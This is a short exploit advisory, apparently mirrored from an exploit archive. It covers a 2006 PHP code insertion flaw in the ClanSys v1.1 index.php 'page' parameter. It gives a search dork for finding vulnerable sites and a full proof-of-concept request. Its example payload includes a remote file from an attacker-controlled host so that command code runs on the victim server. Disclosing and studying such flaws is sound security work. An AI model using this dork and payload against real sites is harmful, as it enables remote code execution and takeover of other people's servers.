id: 377
date: 04/22/2006
title: Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
author: nukedx
cves: 

==================================================================
Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
==================================================================





NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?



#  0day.today [2023-03-22]  #